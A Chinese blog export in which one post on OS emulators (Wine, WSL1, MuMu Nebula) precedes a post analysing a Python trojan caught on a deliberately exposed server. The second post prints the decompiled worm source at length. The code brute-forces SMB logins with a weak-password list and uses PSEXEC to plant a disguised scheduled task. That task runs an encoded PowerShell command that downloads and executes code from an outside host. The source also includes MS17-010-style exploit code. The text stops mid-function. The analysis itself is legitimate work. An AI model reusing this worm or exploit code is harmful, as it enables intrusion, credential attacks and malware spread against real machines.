那至少使用了硬件虚拟化技术的肯定是虚拟机吧？其实这也不一定，现在的Windows有个叫“基于虚拟化的安全性”的功能使用了硬件虚拟化技术，但是不能说现在的Windows是运行在虚拟机上吧？这些大公司搞的乱七八糟的黑科技把我都绕晕了😂。   总之接下来我要说的模拟器是一定基于某个系统，然后模拟另一个系统的环境，不使用硬件虚拟化技术，而且翻译的不是「指令集」，而是「系统调用」，这样感觉才算我心目中的模拟器🫠，也就是OS模拟器。各种各样的OS模拟器MuMu Nebula（Windows模拟Android）既然是因为网易的模拟器进行的探索，肯定要先讲这个啦。首先看介绍，它是专为“低端电脑”制作的模拟器，所以整个软件都是32位的，而且不用VT，说明老到不支持硬件虚拟化的CPU都可以运行（不过那样的CPU估计至少是15年前的吧😝）。安装后首先会下载Android的镜像，但不像其他安卓模拟器最后使用的是一个磁盘镜像文件，而是像WSL1那样把所有文件都放在一个文件夹里。至于里面的文件就是和正常的32位Android x86差不多，甚至还有兼容ARM的libhoudini.so文件。然后启动模拟器后可以在任务管理器中看到有许多“nebula.exe”进程，这让我想到了Wine，看起来在模拟器中的每个安卓进程都对应着一个“nebula.exe”进程。这么来看这个星云引擎应该相当于安卓特别精简版的WSL1。   其实当时WSA出之前，我以为微软会用WSL1的技术做WSA，结果和WSL2一起用了虚拟机，太令人失望了😅。而且用类似WSL1技术的居然还让网易整出来了……虽然到现在WSA已经凉了，这个星云引擎也是没什么热度，不过单从技术上来说我觉得还是这种要好，因为这种模拟器省内存，可以共用磁盘空间，不像其他模拟器，就算虚拟机有什么气球驱动动态调整分配的内存，总是不如这种现用现申请的好。不过从速度上来说和虚拟机版安卓模拟器拉不开什么差距，技术难度估计也比虚拟机高很多，大概因为这样，所以它也凉了吧。WSL1（Windows模拟Linux）网易那个就挺像WSL1的，不过很明显WSL1出的早，另外和Windows结合的更深，可以直接在任务管理器中管理WSL1中的进程。虽然有些人说WSL1的BUG很多，但对我来说我是一个都没碰到过，用起来还是挺不错的……虽然不支持Docker，这也是它对我来说唯一的缺陷。不过我要是用Docker一般是在Hyper-V中单独安一个虚拟机来操作，因为WSL2和Docker desktop的内存不好控制，虚拟机限制起来比较方便。如果需要在Windows用到Linux的时候就安WSL1，因为省内存，而且和Windows共用同一个IP。不过要是安装了Nvidia显卡的话好像还是得用WSL2？我一般没这个需求所以不存在这种问题。Darling（Linux模拟macOS）之前我在玩旧电脑的时候试过Darling，不过用的都是超老的电子垃圾，因为指令集的原因费了不少功夫才跑起来😂，不过就算用正常电脑跑这个感觉也没啥意义，除了项目本身很不成熟，很多软件跑不起来，另外到现在也没有做出来ARM版，x86的macOS马上就要被抛弃了，如果没有搞出ARM版，这个项目就更没什么意义了。Wine（Linux/macOS模拟Windows）Wine我用的还挺多的，因为我现在用的是MacBook，在macOS上玩Windows游戏就得用Wine，另外也在树莓派上试过ExaGear+Wine，其实说来这个项目和使用虚拟机相比，不仅更省内存，而且性能要比虚拟机好得多，除了兼容性不太行之外其他都挺好的，看来省内存是模拟器的特色啊。其他古董模拟器这种倒是挺多的，像DOSBox，还有GBA模拟器之类的，我以前在手机上就试过用DOSBox Turbo安装Windows3.2，也用GBA模拟器玩过宝可梦，不过这些其实不算我心目中的模拟器😆，因为它们不是翻译的系统调用，而是模拟了一块古董CPU，然后装了对应的系统能直接用，只不过大家都说这类算模拟器所以提了一下。感想看起来模拟器相比虚拟机还是有很多优势啊，省内存这一优势还是很重要的，虽然现在内存倒是不贵 （苹果内存除外🤣） ，但是消耗本不必要的内存就是浪费吧。只不过这种东西对技术要求果然还是太高了，实在是费力不讨好，所以没有企业愿意投入精力来做，所以就都凉了啊……   不过Wine倒是活得不错，大概是因为Windows的软件太多了吧……生态很重要啊。" },{ "title": "关于Python制作的木马探索", "category": "", "tags": "Python, 木马, 病毒", "url": "/2024/11/02/trojan.html", "date": "2024/11/02", "content": "想不到木马病毒居然也可以用Python写😆起因在一年前阿里云搞了个高校学生免费领300CNY券的活动，那时候我领了一张并且零元购了一个香港的2c1g轻量服务器，在这一年里它为我做了许多，不仅当延迟极低的梯子，另外还运行着H@H给我赚Hath。一年过后的现在它马上就要过期了，当时我让我的同学也领了一张，正好等到我服务器快过期的时候买，于是我创好服务器并且把我的东西都迁过去，之后旧的服务器就没什么用了。   那在它剩下的最后几天让它干些什么好呢？首先Linux系统感觉没啥意思，装个Windows玩玩吧。不过香港阿里云在装了Linux系统之后是不允许切换成Windows的，而且如果买的时候装Windows还需要额外付费，所以我用了一个一键DD/重装脚本把我的系统重装成Windows Server 2008。不过其实就算刷成Windows也不能改变它没啥用的事实，所以我给它设置了超简单的密码，并且没有装任何补丁，防火墙全关掉，让它在网络上成为能被随意攻破的肉鸡吧。   在这之后没几天我登上去看了一眼，其实看不出来啥，毕竟就算被入侵了绝大多数情况都是被人当备用的，一般人也不会闲着把上面的文件全删掉，把系统搞崩。所以我安了个360，看看有没有中木马，结果还真中了，在Temp目录下多了个“svchost.exe”文件（虽然还有其他的木马文件但不是Python的所以不感兴趣），而且看图标居然是pyinstaller打包的！这让我有点感兴趣了，其他语言写的编译之后很难看出来什么，而且我也看不懂其他语言写的东西，但是Python我至少还是能看懂的，所以我就下载了这个样本尝试获得它的源代码。提取源代码pyinstaller解包还是挺简单的，用PyInstaller Extractor就可以，首先我在我的电脑上尝试解包，不过因为Python版本不对，里面的PYZ文件不能解包，并且提示我使用Python 2.7的环境再试一次。我找了台装有Python 2.7环境的服务器又执行了一次之后就全部解包完了。想不到这个木马居然没有加密😂，直接就能解压，不过就算加密了我之前看过一篇文章可以进行解密。   不过现在得到的文件都是字节码pyc文件，还需要反编译才能看到源代码，这个步骤也很简单，安装个uncompyle6工具就可以。它的主程序名字叫“ii.py”，于是我反编译了一下，不过看起来作者还整了一些混淆，但是极其简单，就把几个函数换成一串变量而已，所以写了个简单的脚本给它还原回去了，最终处理的结果如下（里面有个混淆过的PowerShell版mimikatz，太长了所以我给删掉了）：  Show Code  # uncompyle6 version 3.9.2# Python bytecode version base 2.7 (62211)# Decompiled from: Python 2.7.18 (default, Jun 24 2022, 18:01:55) # [GCC 8.5.0 20210514 (Red Hat 8.5.0-13)]# Embedded file name: ii.pyimport subprocessimport reimport binasciiimport socketimport structimport threadingimport osimport randomimport platformfrom urllib2 import urlopenfrom json import loadfrom impacket import smb, smbconnectionfrom mysmb import MYSMBfrom struct import pack, unpack, unpack_fromimport sysimport socketimport timefrom psexec import PSEXECiplist = ['192.168.0.1/24', '192.168.1.1/24', '192.168.2.1/24', '192.168.3.1/24', '192.168.4.1/24',  '192.168.5.1/24', '192.168.6.1/24', '192.168.7.1/24', '192.168.8.1/24', '192.168.9.1/24',  '192.168.10.1/24', '192.168.18.1/24', '192.168.31.1/24', '192.168.199.1/24',  '192.168.254.1/24', '192.168.67.1/24', '10.0.0.1/24', '10.0.1.1/24', '10.0.2.1/24',  '10.1.1.1/24', '10.90.90.1/24', '10.1.10.1/24', '10.10.1.1/24']userlist = ['', 'Administrator', 'user', 'admin', 'test', 'hp', 'guest']userlist2 = ['', 'Administrator', 'admin']passlist = ['', '123456', 'password', 'qwerty', '12345678', '123456789', '123', '1234',  '123123', '12345', '12345678', '123123123', '1234567890', '88888888', '111111111',  '000000', '111111', '112233', '123321', '654321', '666666', '888888', 'a123456',  '123456a', '5201314', '1qaz2wsx', '1q2w3e4r', 'qwe123', '123qwe', 'a123456789',  '123456789a', 'baseball', 'dragon', 'football', 'iloveyou', 'password',  'sunshine', 'princess', 'welcome', 'abc123', 'monkey', '!@#$%^&*', 'charlie',  'aa123456', 'Aa123456', 'admin', 'homelesspa', 'password1', '1q2w3e4r5t',  'qwertyuiop', '1qaz2wsx']domainlist = ['']nip = []ntlist = []# remove mkatz cause it is too long(https://github.com/DanMcInerney/Invoke-Cats)mkatz = ''def find_ip():    global iplist2    ipconfig_process = subprocess.Popen('ipconfig /all', stdout=subprocess.PIPE)    output = ipconfig_process.stdout.read()    result = re.findall('\\\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\b', output)    for ipaddr in result:        if ipaddr != '127.0.0.1' and ipaddr != '255.255.255.0' and ipaddr != '0.0.0.0':            ipaddr = ipaddr.split('.')[0] + '.' + ipaddr.split('.')[1] + '.' + ipaddr.split('.')[2] + '.1/24'            iplist.append(ipaddr)    netstat_process = subprocess.Popen('netstat -na', stdout=subprocess.PIPE)    output2 = netstat_process.stdout.read()    result2 = re.findall('\\\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\b', output2)    for ip in result2:        if ip != '127.0.0.1' and ip != '0.0.0.0' and ip != '255.255.0.0' and ip != '1.1.1.1':            ip = ip.split('.')[0] + '.' + ip.split('.')[1] + '.' + ip.split('.')[2] + '.1/24'            iplist.append(ip)    try:        ipp1 = urlopen('http://ip.42.pl/raw', timeout=3).read()        ipp1 = ipp1.split('.')[0] + '.' + ipp1.split('.')[1] + '.' + ipp1.split('.')[2] + '.1/24'        ipp2 = load(urlopen('http://jsonip.com', timeout=3))['ip']        ipp2 = ipp2.split('.')[0] + '.' + ipp2.split('.')[1] + '.' + ipp2.split('.')[2] + '.1/24'        iplist.append(ipp1)        iplist.append(ipp2)    except:        pass    iplist2 = list(set(iplist))    iplist2.sort(key=iplist.index)    return iplist2def xip(numb):    del nip[:]    for n in xrange(numb):        ipp = socket.inet_ntoa(struct.pack('>I', random.randint(1, 4294967295L)))        ipp = ipp.split('.')[0] + '.' + ipp.split('.')[1] + '.' + ipp.split('.')[2] + '.1/24'        nip.append(ipp)    return nipdef scan(ip, p):    global timeout    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.settimeout(float(timeout) if timeout else None)    try:        s.connect((ip, p))        return 1    except Exception as e:        return 0def scan2(ip, p):    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.settimeout(float(2))    try:        s.connect((ip, p))        return 1    except Exception as e:        return 0def scan3(ip, p):    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.settimeout(float(1))    try:        s.connect((ip, p))        return 1    except Exception as e:        return 0def validate(ip, fr):    global dl    global domainlist    global ee2    global passlist    global userlist2    for u in userlist2:        for p in passlist:            if u == '' and p != '':                continue            for d in domainlist:                if PSEXEC(ee2, dl, 'cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn \"\\\\Microsoft\\\\windows\\\\Bluetooths\" /tr \"powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=\" /F&&c:\\\\windows\\\\temp\\\\svchost.exe', u, p, d, fr).run(ip):                    print 'SMB Succ!'                    returndef validate2(ip, fr):    global ntlist    for u in userlist2:        for d in domainlist:            for n in ntlist:                if PSEXEC(ee2, dl, 'cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn \"\\\\Microsoft\\\\windows\\\\Bluetooths\" /tr \"powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=\" /F&&c:\\\\windows\\\\temp\\\\svchost.exe', u, '', d, fr, '00000000000000000000000000000000:' + n).run(ip):                    print 'SMB Succ!'                    returndef scansmb(ip, p):    global semaphore1    if scan(ip, 445) == 1:        if scan(ip, 65533) == 0:            print 'exp IP:' + ip            try:                validate(ip, '1')            except:                pass            try:                check_ip(ip, 1)            except:                pass            try:                validate2(ip, '3')            except:                pass    semaphore1.release()def scansmb2(ip, p):    if scan2(ip, 445) == 1:        print 'exp IP:' + ip        try:            validate(ip, '2')        except:            pass        try:            check_ip(ip, 2)        except:            pass        try:            validate2(ip, '2')        except:            pass    semaphore1.release()def scansmb3(ip, p):    global semaphore2    if scan3(ip, 445) == 1:        if scan3(ip, 65533) == 0:            print 'exp IP:' + ip            try:                validate(ip, '2')            except:                pass            try:                check_ip(ip, 2)            except:                pass            try:                validate2(ip, '3')            except:                pass    semaphore2.release()WIN7_64_SESSION_INFO = {'SESSION_SECCTX_OFFSET': 160, 'SESSION_ISNULL_OFFSET': 186, 'FAKE_SECCTX': (pack('<IIQQIIB', 2621994, 1, 0, 0, 2, 0, 1)), 'SECCTX_SIZE': 40}WIN7_32_SESSION_INFO = {'SESSION_SECCTX_OFFSET': 128, 'SESSION_ISNULL_OFFSET': 150, 'FAKE_SECCTX': (pack('<IIIIIIB', 1835562, 1, 0, 0, 2, 0, 1)), 'SECCTX_SIZE': 28}WIN8_64_SESSION_INFO = {'SESSION_SECCTX_OFFSET': 176, 'SESSION_ISNULL_OFFSET': 202, 'FAKE_SECCTX': (pack('<IIQQQQIIB', 3670570, 1, 0, 0, 0, 0, 2, 0, 1)), 'SECCTX_SIZE': 56}WIN8_32_SESSION_INFO = {'SESSION_SECCTX_OFFSET': 136, 'SESSION_ISNULL_OFFSET': 158, 'FAKE_SECCTX': (pack('<IIIIIIIIB', 2359850, 1, 0, 0, 0, 0, 2, 0, 1)), 'SECCTX_SIZE': 36}WIN2K3_64_SESSION_INFO = {'SESSION_ISNULL_OFFSET': 186, 'SESSION_SECCTX_OFFSET': 160, 'SECCTX_PCTXTHANDLE_OFFSET': 16, 'PCTXTHANDLE_TOKEN_OFFSET': 64, 'TOKEN_USER_GROUP_CNT_OFFSET': 76, 'TOKEN_USER_GROUP_ADDR_OFFSET': 104}WIN2K3_32_SESSION_INFO = {'SESSION_ISNULL_OFFSET': 150, 'SESSION_SECCTX_OFFSET': 128, 'SECCTX_PCTXTHANDLE_OFFSET': 12, 'PCTXTHANDLE_TOKEN_OFFSET': 36, 'TOKEN_USER_GROUP_CNT_OFFSET': 76, 'TOKEN_USER_GROUP_ADDR_OFFSET': 104}WINXP_32_SESSION_INFO = {'SESSION_ISNULL_OFFSET': 148, 'SESSION_SECCTX_OFFSET': 132, 'PCTXTHANDLE_TOKEN_OFFSET': 36, 'TOKEN_USER_GROUP_CNT_OFFSET': 76, 'TOKEN_USER_GROUP_ADDR_OFFSET': 104, 'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1': 64, 'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1': 92}WIN2K_32_SESSION_INFO = {'SESSION_ISNULL_OFFSET': 148, 'SESSION_SECCTX_OFFSET': 132, 'PCTXTHANDLE_TOKEN_OFFSET': 36, 'TOKEN_USER_GROUP_CNT_OFFSET': 60, 'TOKEN_USER_GROUP_ADDR_OFFSET': 88}WIN7_32_TRANS_INFO = {'TRANS_SIZE': 160, 'TRANS_FLINK_OFFSET': 24, 'TRANS_INPARAM_OFFSET': 64, 'TRANS_OUTPARAM_OFFSET': 68, 'TRANS_INDATA_OFFSET': 72, 'TRANS_OUTDATA_OFFSET': 76, 'TRANS_PARAMCNT_OFFSET': 88, 'TRANS_TOTALPARAMCNT_OFFSET': 92, 'TRANS_FUNCTION_OFFSET': 114, 'TRANS_MID_OFFSET': 128}WIN7_64_TRANS_INFO = {'TRANS_SIZE': 248, 'TRANS_FLINK_OFFSET': 40, 'TRANS_INPARAM_OFFSET': 112, 'TRANS_OUTPARAM_OFFSET': 120, 'TRANS_INDATA_OFFSET': 128, 'TRANS_OUTDATA_OFFSET': 136, 'TRANS_PARAMCNT_OFFSET': 152, 'TRANS_TOTALPARAMCNT_OFFSET': 156, 'TRANS_FUNCTION_OFFSET': 178, 'TRANS_MID_OFFSET': 192}WIN5_32_TRANS_INFO = {'TRANS_SIZE': 152, 'TRANS_FLINK_OFFSET': 24, 'TRANS_INPARAM_OFFSET': 60, 'TRANS_OUTPARAM_OFFSET': 64, 'TRANS_INDATA_OFFSET': 68, 'TRANS_OUTDATA_OFFSET': 72, 'TRANS_PARAMCNT_OFFSET': 84, 'TRANS_TOTALPARAMCNT_OFFSET': 88, 'TRANS_FUNCTION_OFFSET': 110, 'TRANS_PID_OFFSET': 120, 'TRANS_MID_OFFSET': 124}WIN5_64_TRANS_INFO = {'TRANS_SIZE': 224, 'TRANS_FLINK_OFFSET': 40, 'TRANS_INPARAM_OFFSET': 104, 'TRANS_OUTPARAM_OFFSET': 112, 'TRANS_INDATA_OFFSET': 120, 'TRANS_OUTDATA_OFFSET': 128, 'TRANS_PARAMCNT_OFFSET': 144, 'TRANS_TOTALPARAMCNT_OFFSET': 148, 'TRANS_FUNCTION_OFFSET': 170, 'TRANS_PID_OFFSET': 180, 'TRANS_MID_OFFSET': 184}X86_INFO = {'ARCH': 'x86', 'PTR_SIZE': 4, 'PTR_FMT': 'I', 'FRAG_TAG_OFFSET': 12, 'POOL_ALIGN': 8, 'SRV_BUFHDR_SIZE': 8}X64_INFO = {'ARCH': 'x64', 'PTR_SIZE': 8, 'PTR_FMT': 'Q', 'FRAG_TAG_OFFSET': 20, 'POOL_ALIGN': 16, 'SRV_BUFHDR_SIZE': 16}def merge_dicts(*dict_args):    result = {}    for dictionary in dict_args:        result.update(dictionary)    return resultOS_ARCH_INFO = {'WIN7': {'x86': (merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN7_32_SESSION_INFO)), 'x64': (merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN7_64_SESSION_INFO))}, 'WIN8': {'x86': (merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN8_32_SESSION_INFO)), 'x64': (merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN8_64_SESSION_INFO))}, 'WINXP': {'x86': (merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WINXP_32_SESSION_INFO)), 'x64': (merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO))}, 'WIN2K3': {'x86': (merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K3_32_SESSION_INFO)), 'x64': (merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO))}, 'WIN2K': {'x86': (merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K_32_SESSION_INFO))}}TRANS_NAME_LEN = 4HEAP_HDR_SIZE = 8def calc_alloc_size(size, align_size):    return size + align_size - 1 & ~(align_size - 1)def wait_for_request_processed(conn):    conn.send_echo('a')def find_named_pipe(conn):    pipes = ['browser', 'spoolss', 'netlogon', 'lsarpc', 'samr']    tid = conn.tree_connect_andx('\\\\\\\\' + conn.get_remote_host() + '\\\\' + 'IPC$')    found_pipe = None    for pipe in pipes:        try:            fid = conn.nt_create_andx(tid, pipe)            conn.close(tid, fid)            found_pipe = pipe            break        except smb.SessionError as e:            pass    conn.disconnect_tree(tid)    return found_pipespecial_mid = 0extra_last_mid = 0def reset_extra_mid(conn):    global extra_last_mid    global special_mid    special_mid = (conn.next_mid() & 65280) - 256    extra_last_mid = special_middef next_extra_mid():    global extra_last_mid    extra_last_mid += 1    return extra_last_midGROOM_TRANS_SIZE = 20496def leak_frag_size(conn, tid, fid):    info = {}    mid = conn.next_mid()    req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A' * 4304, maxParameterCount=GROOM_TRANS_SIZE - 4304 - TRANS_NAME_LEN)    req2 = conn.create_nt_trans_secondary_packet(mid, data='B' * 276)    conn.send_raw(req1[:-8])    conn.send_raw(req1[-8:] + req2)    leakData = conn.recv_transaction_data(mid, 4580)    leakData = leakData[4308:]    if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET'] + 4] == 'Frag':        print 'Target is 32 bit'        info['arch'] = 'x86'        info['FRAG_POOL_SIZE'] = ord(leakData[X86_INFO['FRAG_TAG_OFFSET'] - 2]) * X86_INFO['POOL_ALIGN']    elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET'] + 4] == 'Frag':        print 'Target is 64 bit'        info['arch'] = 'x64'        info['FRAG_POOL_SIZE'] = ord(leakData[X64_INFO['FRAG_TAG_OFFSET'] - 2]) * X64_INFO['POOL_ALIGN']    else:        print 'Not found Frag pool tag in leak data'    print ('Got frag size: 0x{:x}').format(info['FRAG_POOL_SIZE'])    return infodef read_data(conn, info, read_addr, read_size):    fmt = info['PTR_FMT']    new_data = pack('<' + fmt * 3, info['trans2_addr'] + info['TRANS_FLINK_OFFSET'], info['trans2_addr'] + 512, read_addr)    new_data += pack('<II', 0, 0)    new_data += pack('<III', 8, 8, 8)    new_data += pack('<III', read_size, read_size, read_size)    new_data += pack('<HH', 0, 5)    conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])    conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=17120, totalParameterCount=4096)    conn.send_nt_trans_secondary(mid=info['trans2_mid'])    read_data = conn.recv_transaction_data(info['trans2_mid'], 8 + read_size)    info['trans2_addr'] = unpack_from('<' + fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']    conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<' + fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])    wait_for_request_processed(conn)    conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])    wait_for_request_processed(conn)    return read_data[8:]def write_data(conn, info, write_addr, write_data):    conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<' + info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])    wait_for_request_processed(conn)    conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)    wait_for_request_processed(conn)def align_transaction_and_leak(conn, tid, fid, info, numFill=4):    trans_param = pack('<HH', fid, 0)    for i in range(numFill):        conn.send_nt_trans(5, param=trans_param, totalDataCount=4304, maxParameterCount=GROOM_TRANS_SIZE - 4304)    mid_ntrename = conn.next_mid()    req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A' * 4304, maxParameterCount=info['GROOM_DATA_SIZE'] - 4304)    req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B' * 276)    req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE'] - 4096, maxParameterCount=4096)    reqs = []    for i in range(12):        mid = next_extra_mid()        reqs.append(conn.create_trans_packet('', mid=mid, param=trans_param, totalDataCount=info['BRIDE_DATA_SIZE'] - 512, totalParameterCount=512, maxDataCount=0, maxParameterCount=0))    conn.send_raw(req1[:-8])    conn.send_raw(req1[-8:] + req2 + req3 + ('').join(reqs))    leakData = conn.recv_transaction_data(mid_ntrename, 4580)    leakData = leakData[4308:]    if leakData[info['FRAG_TAG_OFFSET']:info['FRAG_TAG_OFFSET'] + 4] != 'Frag':        print 'Not found Frag pool tag in leak data'        return None    leakData = leakData[info['FRAG_TAG_OFFSET'] - 4 + info['FRAG_POOL_SIZE']:]    expected_size = pack('<H', info['BRIDE_TRANS_SIZE'])    leakTransOffset = info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE']    if leakData[4:8] != 'LStr' or leakData[info['POOL_ALIGN']:info['POOL_ALIGN'] + 2] != expected_size or leakData[leakTransOffset + 2:leakTransOffset + 4] != expected_size:        print 'No transaction struct in leak data'        return None    leakTrans = leakData[leakTransOffset:]    ptrf = info['PTR_FMT']    _, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<' + ptrf * 5, leakTrans, 8)    inparam_value = unpack_from('<' + ptrf, leakTrans, info['TRANS_INPARAM_OFFSET'])[0]    leak_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]    print ('CONNECTION: 0x{:x}').format(connection_addr)    print ('SESSION: 0x{:x}').format(session_addr)    print ('FLINK: 0x{:x}').format(flink_value)    print ('InParam: 0x{:x}').format(inparam_value)    print ('MID: 0x{:x}').format(leak_mid)    next_page_addr = (inparam_value & 18446744073709547520L) + 4096    if next_page_addr + info['GROOM_POOL_SIZE'] + info['FRAG_POOL_SIZE'] + info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE'] + info['TRANS_FLINK_OFFSET'] != flink_value:        print ('unexpected alignment, diff: 0x{:x}').format(flink_value - next_page_addr)        return None    return {'connection': connection_addr, 'session': session_addr, 'next_page_addr': next_page_addr, 'trans1_mid': leak_mid, 'trans1_addr': (inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN), 'trans2_addr': (flink_value - info['TRANS_FLINK_OFFSET'])}def exploit_matched_pairs(conn, pipe_name, info):    tid = conn.tree_connect_andx('\\\\\\\\' + conn.get_remote_host() + '\\\\' + 'IPC$')    conn.set_default_tid(tid)    fid = conn.nt_create_andx(tid, pipe_name)    info.update(leak_frag_size(conn, tid, fid))    info.update(OS_ARCH_INFO[info['os']][info['arch']])    info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])    print ('GROOM_POOL_SIZE: 0x{:x}').format(info['GROOM_POOL_SIZE'])    info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - info['TRANS_SIZE']    bridePoolSize = 4096 - (info['GROOM_POOL_SIZE'] & 4095) - info['FRAG_POOL_SIZE']    info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])    print ('BRIDE_TRANS_SIZE: 0x{:x}').format(info['BRIDE_TRANS_SIZE'])    info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - info['TRANS_SIZE']    leakInfo = None    for i in range(10):        reset_extra_mid(conn)        leakInfo = align_transaction_and_leak(conn, tid, fid, info)        if leakInfo is not None:            break        print 'leak failed... try again'        conn.close(tid, fid)        conn.disconnect_tree(tid)        tid = conn.tree_connect_andx('\\\\\\\\' + conn.get_remote_host() + '\\\\' + 'IPC$')        conn.set_default_tid(tid)        fid = conn.nt_create_andx(tid, pipe_name)    if leakInfo is None:        return False    info['fid'] = fid    info.update(leakInfo)    shift_indata_byte = 512    conn.do_write_andx_raw_pipe(fid, 'A' * shift_indata_byte)    indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 4096 + shift_indata_byte    indata_next_trans_displacement = info['trans2_addr'] - indata_value    conn.send_nt_trans_secondary(mid=fid, data='\\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])    wait_for_request_processed(conn)    recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')    if recvPkt.getNTStatus() != 65538:        print ('unexpected return status: 0x{:x}').format(recvPkt.getNTStatus())        print '!!! Write to wrong place !!!'        print 'the target might be crashed'        return False    print 'success controlling groom transaction'    print 'modify trans1 struct for arbitrary read/write'    fmt = info['PTR_FMT']    conn.send_nt_trans_secondary(mid=fid, data=pack('<' + fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])    wait_for_request_processed(conn)    conn.send_nt_trans_secondary(mid=special_mid, data=pack('<' + fmt * 3, info['trans1_addr'], info['trans1_addr'] + 512, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])    wait_for_request_processed(conn)    info['trans2_mid'] = conn.next_mid()    conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])    return Truedef exploit_fish_barrel(conn, pipe_name, info):    tid = conn.tree_connect_andx('\\\\\\\\' + conn.get_remote_host() + '\\\\' + 'IPC$')    conn.set_default_tid(tid)    fid = conn.nt_create_andx(tid, pipe_name)    info['fid'] = fid    if info['os'] == 'WIN7' and 'arch' not in info:        info.update(leak_frag_size(conn, tid, fid))    if 'arch' in info:        info.update(OS_ARCH_INFO[info['os']][info['arch']])        attempt_list = [OS_ARCH_INFO[info['os']][info['arch']]]    else:        attempt_list = [         OS_ARCH_INFO[info['os']]['x64'], OS_ARCH_INFO[info['os']]['x86']]    print 'Groom packets'    trans_param = pack('<HH', info['fid'], 0)    for i in range(12):        mid = info['fid'] if i == 8 else next_extra_mid()        conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=256 - TRANS_NAME_LEN, totalDataCount=3776, maxParameterCount=64, maxDataCount=0)    shift_indata_byte = 512    conn.do_write_andx_raw_pipe(info['fid'], 'A' * shift_indata_byte)    success = False    for tinfo in attempt_list:        print 'attempt controlling next transaction on ' + tinfo['ARCH']        HEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE'] + HEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']        NEXT_TRANS_OFFSET = 3840 - shift_indata_byte + HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE        